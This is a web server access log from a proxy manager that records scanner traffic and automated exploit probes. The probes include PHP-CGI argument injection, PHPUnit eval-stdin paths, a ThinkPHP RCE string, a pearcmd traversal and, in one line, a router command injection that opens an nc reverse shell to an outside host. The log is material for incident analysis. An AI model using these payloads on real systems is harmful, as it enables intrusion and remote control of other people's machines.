-[18/Feb/2026:12:01:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:12:05:54 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:12:10:39 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 0] [Gzip -] "-" "-" -[18/Feb/2026:12:14:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:12:37:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 52.165.88.92] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[18/Feb/2026:12:38:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 20.163.1.211] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[18/Feb/2026:12:39:52 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0.0; Moto Z2 Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" -[18/Feb/2026:12:40:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:12:45:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:12:46:44 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale" [Client 5.61.209.92] [Length 150] [Gzip -] "-" "-" -[18/Feb/2026:12:46:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:13:03:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:13:05:55 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 77.83.39.82] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "-" -[18/Feb/2026:13:15:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 162.142.125.35] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[18/Feb/2026:13:15:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.35] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:13:15:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.35] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:13:15:09 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[18/Feb/2026:13:15:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.35] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:13:15:31 +0000] 404 - GET http 222.117.41.51 "/.well-known/security.txt" [Client 162.142.125.35] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[18/Feb/2026:13:23:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 119.28.177.175] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[18/Feb/2026:13:28:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:13:38:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:13:53:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:13:59:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:14:02:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[18/Feb/2026:14:18:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:14:34:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:14:37:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.178.110.241] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[18/Feb/2026:14:46:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:14:59:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.232.121.71] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:14:59:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.232.121.71] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:14:59:31 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:32 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.232.121.71] [Length 154] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:34 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:34 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:36 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:36 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:37 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:39 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:39 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:39 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:41 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:41 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:41 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:42 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:42 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:42 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:43 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:43 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:43 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:44 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:44 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:44 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:45 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:14:59:46 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:15:06:35 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+144.172.73.168+9898+%3E%2Ftmp%2Ff)" [Client 45.148.10.246] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" -[18/Feb/2026:15:11:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:15:26:05 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 144.79.133.252] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:15:26:05 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 144.79.133.252] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:15:26:06 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 144.79.133.252] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:15:27:07 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 144.79.133.252] [Length 154] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:15:35:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:15:35:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:16:02:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:16:08:11 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:16:10:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:16:14:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 152.136.153.69] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" -[18/Feb/2026:16:26:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:16:29:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:16:29:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:16:29:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.134.216.108] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[18/Feb/2026:16:29:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:16:31:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:16:32:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 0] [Gzip -] "-" "-" -[18/Feb/2026:16:50:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:16:56:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 34.79.92.159] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" -[18/Feb/2026:17:02:07 +0000] 404 - GET http 222.117.41.51 "/dispatch.asp" [Client 195.3.221.86] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[18/Feb/2026:17:10:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 43.159.141.115] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:17:10:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 43.159.141.115] [Length 154] [Gzip -] "-" "-" -[18/Feb/2026:17:10:21 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:22 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 43.159.141.115] [Length 154] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" -[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 